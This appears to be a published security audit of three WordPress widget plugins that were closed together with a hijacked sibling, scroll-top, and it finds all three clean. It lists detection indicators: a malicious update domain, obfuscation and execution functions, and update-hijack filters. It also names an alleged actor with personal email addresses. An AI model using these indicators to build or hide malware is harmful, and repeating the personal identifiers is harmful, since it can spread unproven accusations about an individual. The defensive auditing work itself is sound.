← All audits

Audit #49 Benign

3 affected plugins · 21k+ combined active installs · 3 closed on wp.org · baseline → head 2.2.1 · suspect committer satrya · by WP Beacon · closed 4d ago

Actor: Benjamin (wp.org @milkitall, GitHub tombenj, gouldbenjamin135@gmail.com / tomgolan@gmail.com) — operates the inherited @satrya / "Ga Satrya" (gasatrya.dev) account
Show full summary

Verdict: benign — these three plugins are closed but clean. If your site runs Advanced Random Posts Widget, Smart Recent Posts Widget, or Recent Comments Widget Plus, your site is not compromised. We read every file across the full release history of all three and found no malware — no backdoor, no update-channel hijack, no remote code execution, no obfuscation, in any version ever shipped.

All three were closed by WordPress.org on 2026-04-26 (guideline-violation) — the same day as their sibling scroll-top, which was weaponized. scroll-top is a confirmed-malicious Plugin Update Checker (PUC) hijack that redirected its update channel to cdnstaticsync.com. All four plugins live under the same WordPress.org account — satrya / "Ga Satrya" (gasatrya.dev) — which is operated by the actor Benjamin (wp.org @milkitall, GitHub tombenj). When WordPress.org takes down a compromised author account, it closes that author's entire portfolio at once. These three widgets were swept up in that account-level action, not because they contain malicious code.

The actor weaponized only the high-value target: scroll-top has 20,000+ active installs, making its auto-update channel a worthwhile thing to hijack. The three widgets here were left as-is — clean, but tainted by association with the account that owns them. This audit exists to tell the ecosystem the difference: same takedown, same bad actor, but these specific plugins were never weaponized.

Investigated — no compromise found.

Audit retained for the record. No action required.

Affected plugins (3)

All plugins covered by this incident report. Combined exposure: 21k+ active installs across 3 slugs.

Plugin Active installs Trunk version wp.org status
Advanced Random Posts Widget 10k+ 2.2.1 Closed on wp.org
Smart Recent Posts Widget 9k+ 1.0.4 Closed on wp.org
Recent Comments Widget Plus 2k+ 1.3 Closed on wp.org

Scope

Three plugins under the satrya WordPress.org account, all closed the same day:

PluginInstallsHEAD versionClosedReason
advanced-random-posts-widget10,0002.2.1 (2023-08-05)2026-04-26guideline-violation
smart-recent-posts-widget9,0001.0.4 (2024-07-28, r3126813)2026-04-26guideline-violation
comments-widget-plus2,0001.3 (2022-10-26)2026-04-26guideline-violation

How they surfaced

A co-closure cluster pivot: these three closed on the exact day (2026-04-26) as the confirmed-malicious scroll-top, under the same satrya account. WordPress.org closes a compromised author's whole portfolio in one action, so same-day + same-account closures next to a known-malicious plugin are strong audit leads. Each was then deep-audited individually.

File-by-file review (every file, full history)

Each plugin had every PHP/JS file read with full semantic understanding, plus an IOC sweep over every blob in every commit (not just HEAD):

  • No update-channel hijack — no Plugin Update Checker, no pre_set_site_transient_update_plugins/plugins_api/upgrader_* filters, no hardcoded update/download URLs, no cdnstaticsync.com / anadnet /bro/3/ (scroll-top's signature).
  • No remote code — these plugins make no outbound network calls at all. No wp_remote_*, curl_exec, file_get_contents on a URL, fsockopen.
  • No obfuscation / execution primitives — no base64_decode, gzinflate, str_rot13, \x.. chains, eval, assert, create_function, variable-function calls.
  • No file-write / uploader — no $_FILES, move_uploaded_file, or file_put_contents/fwrite to paths outside the plugin directory.
  • No auth backdoor / time-bomb — no magic headers, IP whitelists, conditional admin grants, or date/count-gated activation.

Result: clean for all three, in HEAD and in 100% of release history. They are ordinary WordPress widgets (recent posts / random posts / recent comments) that escape their output and sanitize their inputs.

The r3126813 clarification

smart-recent-posts-widget v1.0.4 (SVN r3126813) was previously referenced as the actor's commit on the hijacked account. On inspection, r3126813 is a security-hardening release, not an injection. Its raw diff looks like a total rewrite only because of a CRLF→LF line-ending normalization; with whitespace ignored, the actual change set is exclusively output-escaping and input-sanitization on existing lines (esc_html/esc_attr/esc_url, sanitize_text_field, wp_strip_all_tags, array_map('intval', …)) plus a Tested up to: 6.5.4 bump. It fixes potential XSS; it ships no payload. r3126813 is useful only as proof the actor had account access — not as evidence of malware in this plugin.

Attribution (the actionable finding)

While the code is clean, the plugin headers carry strong campaign attribution tying this account to the scroll-top hijacker:

  • smart-recent-posts-widget embeds Author Email: gouldbenjamin135@gmail.com from v1.0.3 (2023-08-05) onward — ~2.5 years before the April 2026 scroll-top campaign.
  • comments-widget-plus v1.3 flips the Author URI idenovasi.comgasatrya.dev and author IdenovasiGa Satrya.
  • advanced-random-posts-widget shows the ownership chain Theme Junkie → Idenovasi → satrya.

These plugins were originally built by idenovasi (a legitimate Indonesian agency, idenovasi.com) and migrated to the satrya / "Ga Satrya" identity, which the scroll-top audit (#12) attributes to Benjamin (@milkitall, tombenj, tomgolan@gmail.com). The gouldbenjamin135@gmail.com address found here is an additional identifier for the same actor.

Hijack-indicator matrix

IndicatorResult
Code-level malware patterns?No — zero across full history of all three
Outbound C2 / known bad domains?No — no remote calls of any kind
Update-channel hijack (the scroll-top PUC pattern)?No — absent in HEAD and history
Fresh malicious commit before closure?No — last commits 2022–2024; no 2026 activity
Account ownership drift?Yes — idenovasi → satrya / "Ga Satrya" (gasatrya.dev); gouldbenjamin135@gmail.com in headers since 2023
Actor confirmed bad elsewhere?Yes — same account weaponized scroll-top (audit #12, malicious)

Clean code + positive actor association → benign code, closed as collateral of an account-level takedown.

Comparable cases

  • scroll-top (#12) — the weaponized sibling under the same account: PUC update-channel hijack to cdnstaticsync.com. The contrast is the point of this audit.
  • Method note: same-account co-closure is a strong lead but not proof of malware. WordPress.org takes down a bad actor's entire portfolio at once, so siblings can be clean collateral. The cluster pivot correctly surfaced Benjamin's portfolio; per-plugin deep audits correctly separated the one weaponized plugin (scroll-top) from these three clean ones.